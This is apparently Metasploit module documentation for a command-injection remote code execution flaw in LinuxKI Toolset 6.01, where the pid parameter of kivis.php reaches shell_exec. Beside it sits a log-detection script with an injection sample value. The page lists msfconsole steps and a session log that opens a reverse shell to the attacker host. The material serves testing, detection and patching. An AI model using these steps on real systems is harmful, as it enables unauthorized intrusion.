Vulnerable Application
LinuxKI Toolset <= 6.01
This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
The pid parameter of kivis.php, received from the user, is passed to the shell_exec function, which results in the vulnerability.
To test this application, you need to download version 6.01 here. Do not forget to replace this URL inside the Dockerfile with this one.
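Because the pid value reaches shell_exec, a request to kivis.php whose pid is anything other than a plain decimal number is worth flagging in web server logs. The following is an added detection example, not part of the module or of LinuxKI; it assumes combined-format access logs and that pid travels in the query string, and the log lines and the /linuxki/ path are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client address and request target of a combined-format access log entry.
REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_pid_requests(log_lines, script="kivis.php"):
    """Return (client, decoded pid) for requests to `script` whose pid
    parameter is not made up solely of ASCII decimal digits."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a parseable request line
        url = urlsplit(match.group("target"))
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes values; keep blank ones so "pid=" is seen.
        params = parse_qs(url.query, keep_blank_values=True)
        for pid in params.get("pid", []):
            if not (pid.isascii() and pid.isdigit()):
                hits.append((match.group("client"), pid))
    return hits


# Constructed sample log lines (not captured from a real system).
SAMPLE_LOG = [
    '10.0.0.7 - - [19/May/2020:08:30:01 +0300] '
    '"GET /linuxki/kivis.php?pid=4242 HTTP/1.1" 200 512 "-" "-"',
    '10.0.0.5 - - [19/May/2020:08:32:31 +0300] '
    '"GET /linuxki/kivis.php?pid=4242%3Bid HTTP/1.1" 200 87 "-" "-"',
    '10.0.0.7 - - [19/May/2020:08:33:10 +0300] '
    '"GET /linuxki/index.php?pid=abc HTTP/1.1" 200 90 "-" "-"',
    '10.0.0.9 - - [19/May/2020:08:34:02 +0300] '
    '"GET /linuxki/kivis.php?pid= HTTP/1.1" 200 15 "-" "-"',
]

if __name__ == "__main__":
    for client, pid in suspicious_pid_requests(SAMPLE_LOG):
        print(f"non-numeric pid from {client}: {pid!r}")
```

The same digits-only rule is the server-side fix: reject any pid that fails it before the value gets near a shell.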
Verification Steps
- Install the application
- Start msfconsole
- Do: use exploit/linux/http/linuxki_rce
- Do: set RHOSTS
- Do: set LHOST
- Do: run
- You should get a shell.
Options
TARGETURI
The directory where LinuxKI Toolset is installed
Scenarios
LinuxKI Toolset v6.01
msf5 > use exploit/linux/http/linuxki_rce
msf5 exploit(linux/http/linuxki_rce) > set rhosts 10.0.0.1
rhosts => 10.0.0.1
msf5 exploit(linux/http/linuxki_rce) > set rport 8080
rport => 8080
msf5 exploit(linux/http/linuxki_rce) > check
[+] 10.0.0.1:8080 - The target is vulnerable.
msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.5
lhost => 10.0.0.5
msf5 exploit(linux/http/linuxki_rce) > run
[*] Started reverse TCP handler on 10.0.0.5:4444
[*] Sending exploit...
[*] Command shell session 1 opened (10.0.0.5:4444 -> 10.0.0.1:58914) at 2020-05-19 08:32:32 +0300
id
uid=48(apache) gid=48(apache) groups=48(apache)